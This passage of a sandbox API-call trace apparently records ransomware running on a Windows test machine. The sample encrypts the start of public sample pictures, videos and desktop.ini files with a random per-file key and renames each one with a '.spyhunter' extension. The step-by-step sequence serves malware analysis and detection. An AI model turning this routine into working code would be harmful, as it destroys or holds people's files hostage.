(in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefd0*=0x30) returned 1 [0142.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0142.476] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0142.477] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.477] GetProcessHeap () returned 0x2c0000 [0142.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.477] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cef94*=0x146, lpOverlapped=0x0) returned 1 [0142.478] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.478] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x25cef94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cef94*=0x146, lpOverlapped=0x0) returned 1 [0142.478] GetProcessHeap () returned 0x2c0000 [0142.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0142.478] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.478] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef94, lpOverlapped=0x0 | out: lpBuffer=0x25cefd4*, lpNumberOfBytesWritten=0x25cef94*=0x4, lpOverlapped=0x0) returned 1 [0142.478] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cef94*=0x30, lpOverlapped=0x0) returned 1 [0142.478] CloseHandle (hObject=0xb0) returned 1 [0142.479] GetProcessHeap () returned 0x2c0000 [0142.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.479] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.spyhunter") returned 62 [0142.479] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.spyhunter")) returned 1 [0142.479] GetProcessHeap () returned 0x2c0000 [0142.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.479] GetProcessHeap () returned 0x2c0000 [0142.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.479] GetProcessHeap () returned 0x2c0000 [0142.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc758 | out: hHeap=0x2c0000) returned 1 [0142.479] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefd0 | out: pbBuffer=0x25cefd0) returned 1 [0142.479] GetProcessHeap () returned 0x2c0000 [0142.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.480] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefc8*=0x30) returned 1 [0142.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\.." (normalized: "c:\\users\\public\\videos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.482] GetProcessHeap () returned 0x2c0000 [0142.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.482] GetProcessHeap () returned 0x2c0000 [0142.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b308 | out: hHeap=0x2c0000) returned 1 [0142.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefd0 | out: pbBuffer=0x25cefd0) returned 1 [0142.482] GetProcessHeap () returned 0x2c0000 [0142.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.482] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefc8*=0x30) returned 1 [0142.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\." (normalized: "c:\\users\\public\\videos\\sample videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.482] GetProcessHeap () returned 0x2c0000 [0142.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.482] GetProcessHeap () returned 0x2c0000 [0142.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b3a8 | out: hHeap=0x2c0000) returned 1 [0142.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefc8 | out: pbBuffer=0x25cefc8) returned 1 [0142.482] GetProcessHeap () returned 0x2c0000 [0142.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.482] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefc0*=0x30) returned 1 [0142.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0142.483] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0142.483] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.483] GetProcessHeap () returned 0x2c0000 [0142.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.483] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cef84*=0x17c, lpOverlapped=0x0) returned 1 [0142.484] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.484] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x25cef84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cef84*=0x17c, lpOverlapped=0x0) returned 1 [0142.485] GetProcessHeap () returned 0x2c0000 [0142.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0142.485] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.486] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef84, lpOverlapped=0x0 | out: lpBuffer=0x25cefc4*, lpNumberOfBytesWritten=0x25cef84*=0x4, lpOverlapped=0x0) returned 1 [0142.486] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cef84*=0x30, lpOverlapped=0x0) returned 1 [0142.486] CloseHandle (hObject=0xb0) returned 1 [0142.486] GetProcessHeap () returned 0x2c0000 [0142.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.486] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.spyhunter") returned 48 [0142.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\videos\\desktop.ini.spyhunter")) returned 1 [0142.486] GetProcessHeap () returned 0x2c0000 [0142.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.486] GetProcessHeap () returned 0x2c0000 [0142.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.487] GetProcessHeap () returned 0x2c0000 [0142.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bee8 | out: hHeap=0x2c0000) returned 1 [0142.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefc8 | out: pbBuffer=0x25cefc8) returned 1 [0142.487] GetProcessHeap () returned 0x2c0000 [0142.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.487] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefc0*=0x30) returned 1 [0142.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.488] GetProcessHeap () returned 0x2c0000 [0142.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.488] GetProcessHeap () returned 0x2c0000 [0142.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36a68 | out: hHeap=0x2c0000) returned 1 [0142.488] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefc0 | out: pbBuffer=0x25cefc0) returned 1 [0142.488] GetProcessHeap () returned 0x2c0000 [0142.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.488] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefb8*=0x30) returned 1 [0142.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\." (normalized: "c:\\users\\public\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.488] GetProcessHeap () returned 0x2c0000 [0142.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.488] GetProcessHeap () returned 0x2c0000 [0142.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f369e0 | out: hHeap=0x2c0000) returned 1 [0142.529] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefb8 | out: pbBuffer=0x25cefb8) returned 1 [0142.529] GetProcessHeap () returned 0x2c0000 [0142.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.529] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cefb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cefb0*=0x30) returned 1 [0142.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0142.658] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0142.658] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".txt") returned 0x0 [0142.658] GetProcessHeap () returned 0x2c0000 [0142.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.659] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cef74*=0x2800, lpOverlapped=0x0) returned 1 [0142.734] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.734] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cef74*=0x2800, lpOverlapped=0x0) returned 1 [0142.734] GetProcessHeap () returned 0x2c0000 [0142.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.737] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.737] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x25cefb4*, lpNumberOfBytesWritten=0x25cef74*=0x4, lpOverlapped=0x0) returned 1 [0142.738] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef74*=0x30, lpOverlapped=0x0) returned 1 [0142.738] CloseHandle (hObject=0xb0) returned 1 [0142.973] GetProcessHeap () returned 0x2c0000 [0142.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.973] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.spyhunter") returned 84 [0142.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.spyhunter" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.spyhunter")) returned 1 [0142.974] GetProcessHeap () returned 0x2c0000 [0142.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.974] GetProcessHeap () returned 0x2c0000 [0142.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.974] GetProcessHeap () returned 0x2c0000 [0142.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff79e8 | out: hHeap=0x2c0000) returned 1 [0142.974] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefb8 | out: pbBuffer=0x25cefb8) returned 1 [0142.974] GetProcessHeap () returned 0x2c0000 [0142.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.974] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cefb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cefb0*=0x30) returned 1 [0142.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0142.976] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0142.976] StrStrW (lpFirst="Koala.jpg", lpSrch=".txt") returned 0x0 [0142.976] GetProcessHeap () returned 0x2c0000 [0142.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.976] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cef74*=0x2800, lpOverlapped=0x0) returned 1 [0143.006] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.006] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cef74*=0x2800, lpOverlapped=0x0) returned 1 [0143.006] GetProcessHeap () returned 0x2c0000 [0143.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0143.006] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.006] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x25cefb4*, lpNumberOfBytesWritten=0x25cef74*=0x4, lpOverlapped=0x0) returned 1 [0143.011] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef74*=0x30, lpOverlapped=0x0) returned 1 [0143.011] CloseHandle (hObject=0xb0) returned 1 [0143.011] GetProcessHeap () returned 0x2c0000 [0143.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.011] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.spyhunter") returned 64 [0143.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.spyhunter" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.spyhunter")) returned 1 [0143.012] GetProcessHeap () returned 0x2c0000 [0143.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.012] GetProcessHeap () returned 0x2c0000 [0143.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.012] GetProcessHeap () returned 0x2c0000 [0143.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc5e8 | out: hHeap=0x2c0000) returned 1 [0143.012] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefb0 | out: pbBuffer=0x25cefb0) returned 1 [0143.012] GetProcessHeap () returned 0x2c0000 [0143.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cefa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cefa8*=0x30) returned 1 [0143.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.015] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0143.015] StrStrW (lpFirst="Desert.jpg", lpSrch=".txt") returned 0x0 [0143.015] GetProcessHeap () returned 0x2c0000 [0143.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0143.015] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef6c*=0x2800, lpOverlapped=0x0) returned 1 [0143.077] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.077] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef6c*=0x2800, lpOverlapped=0x0) returned 1 [0143.077] GetProcessHeap () returned 0x2c0000 [0143.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0143.077] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.077] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef6c, lpOverlapped=0x0 | out: lpBuffer=0x25cefac*, lpNumberOfBytesWritten=0x25cef6c*=0x4, lpOverlapped=0x0) returned 1 [0143.078] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef6c*=0x30, lpOverlapped=0x0) returned 1 [0143.078] CloseHandle (hObject=0xb0) returned 1 [0143.079] GetProcessHeap () returned 0x2c0000 [0143.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.079] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.spyhunter") returned 65 [0143.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.spyhunter" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.spyhunter")) returned 1 [0143.079] GetProcessHeap () returned 0x2c0000 [0143.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.079] GetProcessHeap () returned 0x2c0000 [0143.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.079] GetProcessHeap () returned 0x2c0000 [0143.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc530 | out: hHeap=0x2c0000) returned 1 [0143.080] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefb0 | out: pbBuffer=0x25cefb0) returned 1 [0143.080] GetProcessHeap () returned 0x2c0000 [0143.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.080] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cefa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cefa8*=0x30) returned 1 [0143.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.080] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0143.080] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".txt") returned 0x0 [0143.080] GetProcessHeap () returned 0x2c0000 [0143.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0143.080] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef6c*=0x0, lpOverlapped=0x0) returned 1 [0143.081] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.081] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef6c*=0x0, lpOverlapped=0x0) returned 1 [0143.081] GetProcessHeap () returned 0x2c0000 [0143.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0143.081] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.081] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefac*, nNumberOfBytesToWrite=0x4, 